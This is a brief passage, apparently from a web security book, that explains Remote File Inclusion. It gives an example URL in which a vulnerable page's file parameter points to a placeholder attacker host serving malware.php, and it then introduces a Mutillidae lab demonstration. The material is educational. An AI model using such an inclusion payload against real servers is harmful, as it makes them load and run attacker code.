June 2018
Intermediate to advanced
294 pages
7h 5m
English
Remote File Inclusion (RFI) is exploited by including a file path in the URL that points to the remote file outside the boundaries of the web server that hosts the web application.
Consider the following example:
http://domain_name/index.php?file=http://hacker_domain/malware.php
In the preceding URL, the victim server will load the malware.php page that resides on the hacker's server. Let's see a practical example using Mutillidae: